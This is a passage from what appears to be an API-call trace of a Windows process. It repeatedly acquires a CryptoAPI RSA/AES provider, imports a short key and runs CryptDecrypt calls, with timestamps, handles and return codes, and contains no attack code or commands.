phKey=0x18a1fc*=0x758e60) returned 1 [0223.473] CryptContextAddRef (hProv=0x773a80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.473] CryptContextAddRef (hProv=0x773a80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.473] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b810f0) returned 1 [0223.473] CryptContextAddRef (hProv=0x773a80, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.473] CryptSetKeyParam (hKey=0x4b810f0, dwParam=0x4, pbData=0x27116f0*=0x1, dwFlags=0x0) returned 1 [0223.473] CryptSetKeyParam (hKey=0x4b810f0, dwParam=0x1, pbData=0x27116bc, dwFlags=0x0) returned 1 [0223.473] CryptDecrypt (in: hKey=0x4b810f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27117d0, pdwDataLen=0x18a220 | out: pbData=0x27117d0, pdwDataLen=0x18a220) returned 1 [0223.473] CryptDecrypt (in: hKey=0x4b810f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2711818, pdwDataLen=0x18a220 | out: pbData=0x2711818, pdwDataLen=0x18a220) returned 0 [0223.474] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.474] CryptReleaseContext (hProv=0x773a80, dwFlags=0x0) returned 1 [0223.474] CryptReleaseContext (hProv=0x773a80, dwFlags=0x0) returned 1 [0223.474] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773b08) returned 1 [0223.474] CryptImportKey (in: hProv=0x773b08, pbData=0x2711b50, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.474] CryptContextAddRef (hProv=0x773b08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.474] CryptContextAddRef (hProv=0x773b08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.474] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b81170) returned 1 [0223.474] CryptContextAddRef (hProv=0x773b08, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.475] CryptSetKeyParam (hKey=0x4b81170, dwParam=0x4, pbData=0x27122c0*=0x1, dwFlags=0x0) returned 1 [0223.475] CryptSetKeyParam (hKey=0x4b81170, dwParam=0x1, pbData=0x271228c, dwFlags=0x0) returned 1 [0223.475] CryptDecrypt (in: hKey=0x4b81170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27123a0, pdwDataLen=0x18a220 | out: pbData=0x27123a0, pdwDataLen=0x18a220) returned 1 [0223.475] CryptDecrypt (in: hKey=0x4b81170, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27123e8, pdwDataLen=0x18a220 | out: pbData=0x27123e8, pdwDataLen=0x18a220) returned 0 [0223.475] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.475] CryptReleaseContext (hProv=0x773b08, dwFlags=0x0) returned 1 [0223.475] CryptReleaseContext (hProv=0x773b08, dwFlags=0x0) returned 1 [0223.475] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773b90) returned 1 [0223.475] CryptImportKey (in: hProv=0x773b90, pbData=0x2712720, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.476] CryptContextAddRef (hProv=0x773b90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.476] CryptContextAddRef (hProv=0x773b90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.476] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b811f0) returned 1 [0223.477] CryptContextAddRef (hProv=0x773b90, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.477] CryptSetKeyParam (hKey=0x4b811f0, dwParam=0x4, pbData=0x2712e90*=0x1, dwFlags=0x0) returned 1 [0223.477] CryptSetKeyParam (hKey=0x4b811f0, dwParam=0x1, pbData=0x2712e5c, dwFlags=0x0) returned 1 [0223.477] CryptDecrypt (in: hKey=0x4b811f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2712f70, pdwDataLen=0x18a220 | out: pbData=0x2712f70, pdwDataLen=0x18a220) returned 1 [0223.477] CryptDecrypt (in: hKey=0x4b811f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2712fb8, pdwDataLen=0x18a220 | out: pbData=0x2712fb8, pdwDataLen=0x18a220) returned 0 [0223.477] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.477] CryptReleaseContext (hProv=0x773b90, dwFlags=0x0) returned 1 [0223.477] CryptReleaseContext (hProv=0x773b90, dwFlags=0x0) returned 1 [0223.477] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773c18) returned 1 [0223.478] CryptImportKey (in: hProv=0x773c18, pbData=0x2713300, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.478] CryptContextAddRef (hProv=0x773c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.478] CryptContextAddRef (hProv=0x773c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.478] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b81270) returned 1 [0223.478] CryptContextAddRef (hProv=0x773c18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.478] CryptSetKeyParam (hKey=0x4b81270, dwParam=0x4, pbData=0x2713a80*=0x1, dwFlags=0x0) returned 1 [0223.478] CryptSetKeyParam (hKey=0x4b81270, dwParam=0x1, pbData=0x2713a4c, dwFlags=0x0) returned 1 [0223.478] CryptDecrypt (in: hKey=0x4b81270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2713b64, pdwDataLen=0x18a1f0 | out: pbData=0x2713b64, pdwDataLen=0x18a1f0) returned 1 [0223.478] CryptDecrypt (in: hKey=0x4b81270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2713bc4, pdwDataLen=0x18a220 | out: pbData=0x2713bc4, pdwDataLen=0x18a220) returned 1 [0223.478] CryptDecrypt (in: hKey=0x4b81270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2713c04, pdwDataLen=0x18a220 | out: pbData=0x2713c04, pdwDataLen=0x18a220) returned 0 [0223.478] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.478] CryptReleaseContext (hProv=0x773c18, dwFlags=0x0) returned 1 [0223.478] CryptReleaseContext (hProv=0x773c18, dwFlags=0x0) returned 1 [0223.479] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773ca0) returned 1 [0223.479] CryptImportKey (in: hProv=0x773ca0, pbData=0x2713f5c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.479] CryptContextAddRef (hProv=0x773ca0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.479] CryptContextAddRef (hProv=0x773ca0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.479] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b812f0) returned 1 [0223.479] CryptContextAddRef (hProv=0x773ca0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.479] CryptSetKeyParam (hKey=0x4b812f0, dwParam=0x4, pbData=0x27146cc*=0x1, dwFlags=0x0) returned 1 [0223.479] CryptSetKeyParam (hKey=0x4b812f0, dwParam=0x1, pbData=0x2714698, dwFlags=0x0) returned 1 [0223.480] CryptDecrypt (in: hKey=0x4b812f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27147ac, pdwDataLen=0x18a220 | out: pbData=0x27147ac, pdwDataLen=0x18a220) returned 1 [0223.480] CryptDecrypt (in: hKey=0x4b812f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27147fc, pdwDataLen=0x18a220 | out: pbData=0x27147fc, pdwDataLen=0x18a220) returned 0 [0223.480] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.480] CryptReleaseContext (hProv=0x773ca0, dwFlags=0x0) returned 1 [0223.480] CryptReleaseContext (hProv=0x773ca0, dwFlags=0x0) returned 1 [0223.480] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773d28) returned 1 [0223.480] CryptImportKey (in: hProv=0x773d28, pbData=0x2714b50, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.480] CryptContextAddRef (hProv=0x773d28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.480] CryptContextAddRef (hProv=0x773d28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.480] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b81370) returned 1 [0223.481] CryptContextAddRef (hProv=0x773d28, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.481] CryptSetKeyParam (hKey=0x4b81370, dwParam=0x4, pbData=0x27152c0*=0x1, dwFlags=0x0) returned 1 [0223.481] CryptSetKeyParam (hKey=0x4b81370, dwParam=0x1, pbData=0x271528c, dwFlags=0x0) returned 1 [0223.481] CryptDecrypt (in: hKey=0x4b81370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27153a0, pdwDataLen=0x18a220 | out: pbData=0x27153a0, pdwDataLen=0x18a220) returned 1 [0223.481] CryptDecrypt (in: hKey=0x4b81370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27153e8, pdwDataLen=0x18a220 | out: pbData=0x27153e8, pdwDataLen=0x18a220) returned 0 [0223.481] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.481] CryptReleaseContext (hProv=0x773d28, dwFlags=0x0) returned 1 [0223.481] CryptReleaseContext (hProv=0x773d28, dwFlags=0x0) returned 1 [0223.481] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773db0) returned 1 [0223.481] CryptImportKey (in: hProv=0x773db0, pbData=0x2715720, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.482] CryptContextAddRef (hProv=0x773db0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.482] CryptContextAddRef (hProv=0x773db0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.482] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b813f0) returned 1 [0223.482] CryptContextAddRef (hProv=0x773db0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.482] CryptSetKeyParam (hKey=0x4b813f0, dwParam=0x4, pbData=0x2715e90*=0x1, dwFlags=0x0) returned 1 [0223.482] CryptSetKeyParam (hKey=0x4b813f0, dwParam=0x1, pbData=0x2715e5c, dwFlags=0x0) returned 1 [0223.482] CryptDecrypt (in: hKey=0x4b813f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2715f70, pdwDataLen=0x18a220 | out: pbData=0x2715f70, pdwDataLen=0x18a220) returned 1 [0223.482] CryptDecrypt (in: hKey=0x4b813f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2715fb8, pdwDataLen=0x18a220 | out: pbData=0x2715fb8, pdwDataLen=0x18a220) returned 0 [0223.482] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.482] CryptReleaseContext (hProv=0x773db0, dwFlags=0x0) returned 1 [0223.482] CryptReleaseContext (hProv=0x773db0, dwFlags=0x0) returned 1 [0223.482] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773e38) returned 1 [0223.483] CryptImportKey (in: hProv=0x773e38, pbData=0x27162f0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.483] CryptContextAddRef (hProv=0x773e38, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.483] CryptContextAddRef (hProv=0x773e38, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.483] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b81470) returned 1 [0223.483] CryptContextAddRef (hProv=0x773e38, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.483] CryptSetKeyParam (hKey=0x4b81470, dwParam=0x4, pbData=0x2716a60*=0x1, dwFlags=0x0) returned 1 [0223.483] CryptSetKeyParam (hKey=0x4b81470, dwParam=0x1, pbData=0x2716a2c, dwFlags=0x0) returned 1 [0223.483] CryptDecrypt (in: hKey=0x4b81470, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2716b40, pdwDataLen=0x18a220 | out: pbData=0x2716b40, pdwDataLen=0x18a220) returned 1 [0223.483] CryptDecrypt (in: hKey=0x4b81470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2716b8c, pdwDataLen=0x18a220 | out: pbData=0x2716b8c, pdwDataLen=0x18a220) returned 0 [0223.483] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.483] CryptReleaseContext (hProv=0x773e38, dwFlags=0x0) returned 1 [0223.483] CryptReleaseContext (hProv=0x773e38, dwFlags=0x0) returned 1 [0223.483] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773ec0) returned 1 [0223.484] CryptImportKey (in: hProv=0x773ec0, pbData=0x2716ed0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.484] CryptContextAddRef (hProv=0x773ec0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.484] CryptContextAddRef (hProv=0x773ec0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.484] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b814f0) returned 1 [0223.484] CryptContextAddRef (hProv=0x773ec0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.484] CryptSetKeyParam (hKey=0x4b814f0, dwParam=0x4, pbData=0x2717640*=0x1, dwFlags=0x0) returned 1 [0223.484] CryptSetKeyParam (hKey=0x4b814f0, dwParam=0x1, pbData=0x271760c, dwFlags=0x0) returned 1 [0223.484] CryptDecrypt (in: hKey=0x4b814f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2717720, pdwDataLen=0x18a220 | out: pbData=0x2717720, pdwDataLen=0x18a220) returned 1 [0223.484] CryptDecrypt (in: hKey=0x4b814f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2717768, pdwDataLen=0x18a220 | out: pbData=0x2717768, pdwDataLen=0x18a220) returned 0 [0223.484] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.484] CryptReleaseContext (hProv=0x773ec0, dwFlags=0x0) returned 1 [0223.484] CryptReleaseContext (hProv=0x773ec0, dwFlags=0x0) returned 1 [0223.484] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773f48) returned 1 [0223.485] CryptImportKey (in: hProv=0x773f48, pbData=0x2717aa0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.485] CryptContextAddRef (hProv=0x773f48, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.485] CryptContextAddRef (hProv=0x773f48, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.485] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b81570) returned 1 [0223.485] CryptContextAddRef (hProv=0x773f48, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.485] CryptSetKeyParam (hKey=0x4b81570, dwParam=0x4, pbData=0x2718210*=0x1, dwFlags=0x0) returned 1 [0223.485] CryptSetKeyParam (hKey=0x4b81570, dwParam=0x1, pbData=0x27181dc, dwFlags=0x0) returned 1 [0223.485] CryptDecrypt (in: hKey=0x4b81570, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27182f0, pdwDataLen=0x18a220 | out: pbData=0x27182f0, pdwDataLen=0x18a220) returned 1 [0223.485] CryptDecrypt (in: hKey=0x4b81570, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2718338, pdwDataLen=0x18a220 | out: pbData=0x2718338, pdwDataLen=0x18a220) returned 0 [0223.486] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.486] CryptReleaseContext (hProv=0x773f48, dwFlags=0x0) returned 1 [0223.486] CryptReleaseContext (hProv=0x773f48, dwFlags=0x0) returned 1 [0223.486] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x773fd0) returned 1 [0223.486] CryptImportKey (in: hProv=0x773fd0, pbData=0x2718674, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.486] CryptContextAddRef (hProv=0x773fd0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.486] CryptContextAddRef (hProv=0x773fd0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.486] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b815f0) returned 1 [0223.486] CryptContextAddRef (hProv=0x773fd0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.486] CryptSetKeyParam (hKey=0x4b815f0, dwParam=0x4, pbData=0x2718de4*=0x1, dwFlags=0x0) returned 1 [0223.487] CryptSetKeyParam (hKey=0x4b815f0, dwParam=0x1, pbData=0x2718db0, dwFlags=0x0) returned 1 [0223.487] CryptDecrypt (in: hKey=0x4b815f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2718ec4, pdwDataLen=0x18a220 | out: pbData=0x2718ec4, pdwDataLen=0x18a220) returned 1 [0223.487] CryptDecrypt (in: hKey=0x4b815f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2718f0c, pdwDataLen=0x18a220 | out: pbData=0x2718f0c, pdwDataLen=0x18a220) returned 0 [0223.487] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.487] CryptReleaseContext (hProv=0x773fd0, dwFlags=0x0) returned 1 [0223.487] CryptReleaseContext (hProv=0x773fd0, dwFlags=0x0) returned 1 [0223.487] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x774058) returned 1 [0223.487] CryptImportKey (in: hProv=0x774058, pbData=0x2719254, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.488] CryptContextAddRef (hProv=0x774058, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.488] CryptContextAddRef (hProv=0x774058, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.488] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b81670) returned 1 [0223.488] CryptContextAddRef (hProv=0x774058, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.488] CryptSetKeyParam (hKey=0x4b81670, dwParam=0x4, pbData=0x27199d4*=0x1, dwFlags=0x0) returned 1 [0223.488] CryptSetKeyParam (hKey=0x4b81670, dwParam=0x1, pbData=0x27199a0, dwFlags=0x0) returned 1 [0223.488] CryptDecrypt (in: hKey=0x4b81670, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2719ab8, pdwDataLen=0x18a1f0 | out: pbData=0x2719ab8, pdwDataLen=0x18a1f0) returned 1 [0223.488] CryptDecrypt (in: hKey=0x4b81670, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2719b18, pdwDataLen=0x18a220 | out: pbData=0x2719b18, pdwDataLen=0x18a220) returned 1 [0223.488] CryptDecrypt (in: hKey=0x4b81670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2719b64, pdwDataLen=0x18a220 | out: pbData=0x2719b64, pdwDataLen=0x18a220) returned 0 [0223.488] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.488] CryptReleaseContext (hProv=0x774058, dwFlags=0x0) returned 1 [0223.488] CryptReleaseContext (hProv=0x774058, dwFlags=0x0) returned 1 [0223.488] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7740e0) returned 1 [0223.489] CryptImportKey (in: hProv=0x7740e0, pbData=0x2719ed8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.489] CryptContextAddRef (hProv=0x7740e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.489] CryptContextAddRef (hProv=0x7740e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.489] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b816f0) returned 1 [0223.489] CryptContextAddRef (hProv=0x7740e0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.489] CryptSetKeyParam (hKey=0x4b816f0, dwParam=0x4, pbData=0x271a648*=0x1, dwFlags=0x0) returned 1 [0223.489] CryptSetKeyParam (hKey=0x4b816f0, dwParam=0x1, pbData=0x271a614, dwFlags=0x0) returned 1 [0223.489] CryptDecrypt (in: hKey=0x4b816f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x271a728, pdwDataLen=0x18a220 | out: pbData=0x271a728, pdwDataLen=0x18a220) returned 1 [0223.489] CryptDecrypt (in: hKey=0x4b816f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x271a770, pdwDataLen=0x18a220 | out: pbData=0x271a770, pdwDataLen=0x18a220) returned 0 [0223.489] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.489] CryptReleaseContext (hProv=0x7740e0, dwFlags=0x0) returned 1 [0223.489] CryptReleaseContext (hProv=0x7740e0, dwFlags=0x0) returned 1 [0223.489] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x774168) returned 1 [0223.490] CryptImportKey (in: hProv=0x774168, pbData=0x271aaac, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.490] CryptContextAddRef (hProv=0x774168, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.490] CryptContextAddRef (hProv=0x774168, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.490] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b81770) returned 1 [0223.490] CryptContextAddRef (hProv=0x774168, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.490] CryptSetKeyParam (hKey=0x4b81770, dwParam=0x4, pbData=0x271b21c*=0x1, dwFlags=0x0) returned 1 [0223.490] CryptSetKeyParam (hKey=0x4b81770, dwParam=0x1, pbData=0x271b1e8, dwFlags=0x0) returned 1 [0223.490] CryptDecrypt (in: hKey=0x4b81770, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x271b2fc, pdwDataLen=0x18a220 | out: pbData=0x271b2fc, pdwDataLen=0x18a220) returned 1 [0223.490] CryptDecrypt (in: hKey=0x4b81770, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x271b344, pdwDataLen=0x18a220 | out: pbData=0x271b344, pdwDataLen=0x18a220) returned 0 [0223.490] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.490] CryptReleaseContext (hProv=0x774168, dwFlags=0x0) returned 1 [0223.490] CryptReleaseContext (hProv=0x774168, dwFlags=0x0) returned 1 [0223.490] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7aad18) returned 1 [0223.491] CryptImportKey (in: hProv=0x7aad18, pbData=0x271b690, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.491] CryptContextAddRef (hProv=0x7aad18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.491] CryptContextAddRef (hProv=0x7aad18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.491] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b817f0) returned 1 [0223.491] CryptContextAddRef (hProv=0x7aad18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.491] CryptSetKeyParam (hKey=0x4b817f0, dwParam=0x4, pbData=0x271be10*=0x1, dwFlags=0x0) returned 1 [0223.492] CryptSetKeyParam (hKey=0x4b817f0, dwParam=0x1, pbData=0x271bddc, dwFlags=0x0) returned 1 [0223.492] CryptDecrypt (in: hKey=0x4b817f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x271bef4, pdwDataLen=0x18a1f0 | out: pbData=0x271bef4, pdwDataLen=0x18a1f0) returned 1 [0223.492] CryptDecrypt (in: hKey=0x4b817f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x271bf54, pdwDataLen=0x18a220 | out: pbData=0x271bf54, pdwDataLen=0x18a220) returned 1 [0223.492] CryptDecrypt (in: hKey=0x4b817f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x271bfa0, pdwDataLen=0x18a220 | out: pbData=0x271bfa0, pdwDataLen=0x18a220) returned 0 [0223.492] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.492] CryptReleaseContext (hProv=0x7aad18, dwFlags=0x0) returned 1 [0223.492] CryptReleaseContext (hProv=0x7aad18, dwFlags=0x0) returned 1 [0223.492] CryptAcquireContextW (in: phProv=0x18a234, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a234*=0x7aada0) returned 1 [0223.492] CryptImportKey (in: hProv=0x7aada0, pbData=0x271c318, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18a1fc | out: phKey=0x18a1fc*=0x758e60) returned 1 [0223.493] CryptContextAddRef (hProv=0x7aada0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.493] CryptContextAddRef (hProv=0x7aada0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.493] CryptDuplicateKey (in: hKey=0x758e60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18a1f0 | out: phKey=0x18a1f0*=0x4b81870) returned 1 [0223.493] CryptContextAddRef (hProv=0x7aada0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0223.493] CryptSetKeyParam (hKey=0x4b81870, dwParam=0x4, pbData=0x271ca88*=0x1, dwFlags=0x0) returned 1 [0223.493] CryptSetKeyParam (hKey=0x4b81870, dwParam=0x1, pbData=0x271ca54, dwFlags=0x0) returned 1 [0223.493] CryptDecrypt (in: hKey=0x4b81870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x271cb68, pdwDataLen=0x18a220 | out: pbData=0x271cb68, pdwDataLen=0x18a220) returned 1 [0223.493] CryptDecrypt (in: hKey=0x4b81870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x271cbb0, pdwDataLen=0x18a220 | out: pbData=0x271cbb0, pdwDataLen=0x18a220) 